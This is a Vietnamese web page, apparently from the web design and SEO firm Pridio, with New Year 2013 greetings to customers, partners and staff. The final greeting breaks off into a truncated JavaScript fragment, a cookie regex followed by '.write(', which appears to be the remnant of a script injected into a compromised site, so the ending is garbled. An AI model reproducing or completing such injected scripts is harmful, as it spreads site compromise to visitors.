Merry Christmas! Happy New Year

header facebook + logo

Lời chúc gửi tới khách hàng

Pridio chân thành cảm ơn quý khách hàng đã dành tình yêu mến, niềm tin cho chúng tôi trong suốt một năm qua. Mặc dù gặp không ít khó khăn, thách thức cũng như có nhiều sự thay đổi trong công việc, nhưng Pridio sẽ luông cố gắng để hoàn thành tốt nhất công việc của khách hàng giao phó.

Nhân dịp năm mới 2013, kính chúc quý khách an khang thịnh vượng, gặp nhiều may mắn trong công việc và cuộc sống. Hy vọng với sự hợp tác này, chúng ta sẽ cùng nhau tạo dựng được nhiều giá trị tốt đẹp hơn cho mỗi bên và cùng nhau phát triển bền vững.

Lời chúc năm mới cho đối tác

Năm mới, Pridio kính chúc quý đối tác thành đạt và gặt hái nhiều thành công trong công việc. Chúc quý khách hàng sức khoẻ, niềm vui và tất cả những gì tốt đẹp nhất. Chúc cho sự quan hệ của chúng ta sẽ lâu dài và luôn tốt đẹp.

Pridio luôn coi đối tác là người bạn tốt và luôn cố gắng cung cấp cho đối tác những dịch vụ tốt nhất nhằm phục vụ tối ưu cho khách hàng chung. Pridio hy vọng rằng qua năm 2013 và các năm sau nữa, chúng ta sẽ trở thành những liên hiệp dịch vụ tốt nhất trong lĩnh vực online marketing – SEO hoặc giải pháp web design và mang tới những giải pháp mới hơn cho thị trường.

Kính mong quý đối tác gìn giữ và trân trọng những gì mà chúng ta đã làm và tiếp tục đẩy mạnh hơn nữa những thế mạnh mà chúng ta đã cùng nhau tạo dựng được.

Lời chúc năm mới tới thành viên Pridio

Cảm ơn các thành viên Pridio trong năm qua đã đồng hành và nỗ lực làm việc để vượt qua một năm đầy khó khăn, khắc nghiệt. Mặc dù còn nhiều việc phải làm và rất nhiều vấn đề cần nghiên cứu, cải thiện, nhưng hy vọng rằng năm tới 2013 sẽ đến với khả năng tốt hơn, nội lực mạnh mẽ hơn.

Pridio luôn chắc chắn con đường phát triển lâu dài, mang tới nghề nghiệp ổn định và bền vững cho thành viên công ty, đồng thời đào tạo có định hướng các thành viên tới sự phát triển sâu về khả năng chuyên môn. Cũng thông qua sự phát triển đó, chúng tôi đặt niềm tin rằng các bạn sẽ chính là những người nắm giữ những vị trí quan trọng, cốt cán trong công ty sau này.

Chúng ta sẽ hướng tới một năm 2013 “làm hết sức – chơi hết lực” đồng thời hoà đồng và đào tạo thành viên mới tinh thần đoàn kết tương trợ song hành cùng toàn thể anh em trên con thuyền khó khăn này.

Năm 2013 sẽ có nhiều thay đổi, chắc chắn chúng ta sẽ bước ra ngoài thị trường Việt Nam và tham gia vào Global Market, hãy cố gắng hoàn thiện mình hơn nữa để có thể làm được nhiều điều mà chúng ta mơ ước.

Chúc toàn thể anh chị em Pridio luôn khoẻ, vui vẻ, chúc gia đình và bạn bè các bạn luôn được bình an hạnh phúc. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘